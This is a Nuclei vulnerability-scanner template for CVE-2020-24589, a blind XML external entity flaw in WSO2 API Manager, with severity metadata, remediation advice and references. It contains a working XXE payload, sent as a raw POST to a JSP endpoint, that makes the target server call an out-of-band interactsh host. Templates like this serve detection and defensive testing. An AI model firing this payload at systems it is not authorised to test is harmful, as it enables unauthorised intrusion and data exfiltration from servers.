nuclei-templates/http/cves/2020/CVE-2020-24589.yaml

id: CVE-2020-24589

info:
  name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
  author: lethargynavigator
  severity: critical
  description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
  remediation: |
    Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24589
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24589
    cwe-id: CWE-611
    epss-score: 0.55133
    epss-percentile: 0.97313
    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wso2
    product: api_manager
  tags: cve,cve2020,wso2,xxe,oast,blind

http:
  - raw:
      - |
        POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Failed to install the generic artifact type"

# digest: 490a00463044022040323c08a6e846c208a0622781f33c9894cade174931ee89690d35fca6fae1d802202e8eabb83778b40e18238c415f479df0fc01f5a21c1d850d8c336e459cef8413:922c64590222798bb761d5b6d8e72950